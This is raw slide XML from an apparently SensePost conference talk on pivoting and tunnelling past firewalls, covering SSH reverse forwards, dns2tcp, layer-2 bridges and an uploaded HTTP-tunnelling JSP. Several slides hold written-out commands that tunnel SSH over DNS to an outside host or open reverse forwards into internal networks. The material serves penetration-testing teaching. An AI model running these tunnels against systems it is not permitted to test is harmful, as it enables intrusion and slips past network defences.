            <a:ext cx="1219200" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Listens on </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>port 22</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="victim-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7033418" y="1731744"/>
            <a:ext cx="1168400" cy="1168400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Right Arrow 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4963318" y="1732043"/>
            <a:ext cx="2396067" cy="11420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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –R 55555:localmachine:445</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Merge 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7263025" y="1315721"/>
            <a:ext cx="822960" cy="436879"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMerge">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rounded Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="3048000"/>
            <a:ext cx="22860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Target runs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1585965" y="2518528"/>
            <a:ext cx="865980" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Listens on </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>port 445</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="L-Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4362864" y="-967211"/>
            <a:ext cx="751860" cy="6219615"/>
          </a:xfrm>
          <a:prstGeom prst="corner">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr vert="vert"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Proxy connection from target:55555 to local machine:445</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7696200" y="3150513"/>
            <a:ext cx="865980" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Listens on </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>port 55555</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18" grpId="1" animBg="1"/>
      <p:bldP spid="2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Interlude (dns2tcp)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Available from: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.hsc.fr/ressources/outils/dns2tcp/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Perfect for homes away form home</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Perfect for stealing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> access</a:t>
            </a:r>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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tunnels over dns2tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228599" y="2283854"/>
            <a:ext cx="3528907" cy="3354946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4131733" y="2025999"/>
            <a:ext cx="2171700" cy="1651000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6819900" y="1054100"/>
            <a:ext cx="2057400" cy="1155700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848600" y="2283854"/>
            <a:ext cx="736600" cy="965200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2226733" y="1229729"/>
            <a:ext cx="1905000" cy="796270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="5181600"/>
            <a:ext cx="2971800" cy="1003300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7683500" y="4495800"/>
            <a:ext cx="1003300" cy="927100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1187100"/>
            <a:ext cx="2209800" cy="800799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Right Arrow 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="1676401"/>
            <a:ext cx="5410200" cy="2286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dns2tcp -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>mooo.mooo.mooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> 55555 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>SPDNSTUNNEL.sensepost.com</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Right Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="2286000"/>
            <a:ext cx="5410200" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="righ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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/key -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> 55555 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>tunnelUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> -R 4444:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Internal_IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" smtClean="0"/>
              <a:t>&gt;:&lt;port&gt; -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" smtClean="0"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>stricthostkeychecking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" smtClean="0"/>
              <a:t>=no” 127.0.0.1 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Left Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="2590800"/>
            <a:ext cx="5334000" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="lef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Route traffic inside the tunnel to listening port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Up Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7366000" y="3352800"/>
            <a:ext cx="1485900" cy="100544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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> –L 3333: &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&gt;:4444</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4" grpId="0" animBg="1"/>
      <p:bldP spid="18"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2 bridges</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you aren’t going to the network, bring the network to you</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you’re bridging the network, make it protocol independent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Requires inbound or outbound connection ability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ayer2-bridge-setup.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="381000"/>
            <a:ext cx="7162801" cy="2705100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="layer2-bridge-complete.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="3581400"/>
            <a:ext cx="7162801" cy="2705100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Down Arrow 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4318175" y="2895600"/>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2 bridges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Pros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Clean interface to network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not port or connection dependent, protocol independent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simple to setup and use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Death by firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Requires external </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>deps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pcap,libnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Tratt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Olleb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>www.toolcrypt.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MyNetwork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> by Greg </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Hoglund</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>www.rootkit.com</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Brief Recap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We used to be able to hit everything we wanted to.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We were happily redirecting traffic when firewalls were more forgiving</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Outbound Access Made us amazingly happy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network level bridging was cool but the rules are changing..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can we do this completely over HTTP / HTTPS?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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>glenn.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3556" dirty="0" smtClean="0"/>
              <a:t>(working title)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We can hit our target on port 80 (or 443)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ability to upload / create a web page on the target [example: JMX Console]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network level filtering is tight.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Possible reverse proxies in-between</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>a],[b],[c],[d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>] meet [one smart intern]</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Picture it..</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="reader_1.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-5237" r="-5237"/>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About:us</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SensePost</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
